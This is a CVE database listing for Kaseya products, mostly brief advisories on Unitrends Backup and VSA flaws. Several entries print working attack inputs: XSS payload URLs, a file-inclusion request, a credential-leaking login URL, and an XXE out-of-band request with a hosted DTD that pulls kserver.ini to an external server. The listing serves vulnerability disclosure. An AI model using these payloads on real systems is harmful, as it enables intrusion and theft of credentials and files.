Filtered by vendor Kaseya
Subscribe
Total
35 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2021-40386 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 7.5 HIGH | 9.8 CRITICAL |
| Kaseya Unitrends Client/Agent through 10.5,5 allows remote attackers to execute arbitrary code. | |||||
| CVE-2021-43040 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 6.5 MEDIUM | 8.8 HIGH |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The privileged vaultServer could be leveraged to create arbitrary writable files, leading to privilege escalation. | |||||
| CVE-2021-43035 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 7.5 HIGH | 9.8 CRITICAL |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. Two unauthenticated SQL injection vulnerabilities were discovered, allowing arbitrary SQL queries to be injected and executed under the postgres superuser account. Remote code execution was possible, leading to full access to the postgres user account. | |||||
| CVE-2021-43033 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 10.0 HIGH | 9.8 CRITICAL |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. Multiple functions in the bpserverd daemon were vulnerable to arbitrary remote code execution as root. The vulnerability was caused by untrusted input (received by the server) being passed to system calls. | |||||
| CVE-2021-43036 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 7.5 HIGH | 9.8 CRITICAL |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The password for the PostgreSQL wguest account is weak. | |||||
| CVE-2021-43037 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 6.9 MEDIUM | 7.8 HIGH |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The Unitrends Windows agent was vulnerable to DLL injection and binary planting due to insecure default permissions. This allowed privilege escalation from an unprivileged user to SYSTEM. | |||||
| CVE-2021-43044 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 7.5 HIGH | 9.8 CRITICAL |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The SNMP daemon was configured with a weak default community. | |||||
| CVE-2021-43038 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 6.5 MEDIUM | 8.8 HIGH |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The wguest account could execute commands by injecting into PostgreSQL trigger functions. This allowed privilege escalation from the wguest user to the postgres user. | |||||
| CVE-2021-43043 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 4.0 MEDIUM | 6.5 MEDIUM |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The apache user could read arbitrary files such as /etc/shadow by abusing an insecure Sudo rule. | |||||
| CVE-2021-43041 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 6.5 MEDIUM | 8.8 HIGH |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. A crafted HTTP request could induce a format string vulnerability in the privileged vaultServer application. | |||||
| CVE-2021-43034 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 4.6 MEDIUM | 7.8 HIGH |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. A world writable file allowed local users to execute arbitrary code as the user apache, leading to privilege escalation. | |||||
| CVE-2021-43042 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 7.5 HIGH | 9.8 CRITICAL |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. A buffer overflow existed in the vaultServer component. This was exploitable by a remote unauthenticated attacker. | |||||
| CVE-2021-43039 | 1 Kaseya | 1 Unitrends Backup | 2023-12-10 | 6.4 MEDIUM | 6.5 MEDIUM |
| An issue was discovered in Kaseya Unitrends Backup Appliance before 10.5.5. The Samba file sharing service allowed anonymous read/write access. | |||||
| CVE-2021-30119 | 1 Kaseya | 1 Vsa | 2023-12-10 | 3.5 LOW | 5.4 MEDIUM |
| Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078` | |||||
| CVE-2021-30121 | 1 Kaseya | 1 Vsa | 2023-12-10 | 4.0 MEDIUM | 6.5 MEDIUM |
| Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118 | |||||
| CVE-2021-40385 | 1 Kaseya | 1 Unitrends Backup Software | 2023-12-10 | 9.0 HIGH | 8.8 HIGH |
| An issue was discovered in the server software in Kaseya Unitrends Backup Software before 10.5.5-2. There is a privilege escalation from read-only user to admin. | |||||
| CVE-2021-30120 | 1 Kaseya | 1 Vsa | 2023-12-10 | 5.0 MEDIUM | 7.5 HIGH |
| Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in. | |||||
| CVE-2021-30116 | 1 Kaseya | 2 Vsa Agent, Vsa Server | 2023-12-10 | 7.5 HIGH | 9.8 CRITICAL |
| Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\Program Files (x86)\Kaseya\XXXXXXXXXX\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system. | |||||
| CVE-2021-40387 | 1 Kaseya | 1 Unitrends Backup Software | 2023-12-10 | 9.0 HIGH | 8.8 HIGH |
| An issue was discovered in the server software in Kaseya Unitrends Backup Software before 10.5.5-2. There is authenticated remote code execution. | |||||
| CVE-2021-30201 | 1 Kaseya | 1 Vsa | 2023-12-10 | 5.0 MEDIUM | 7.5 HIGH |
| The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network. | |||||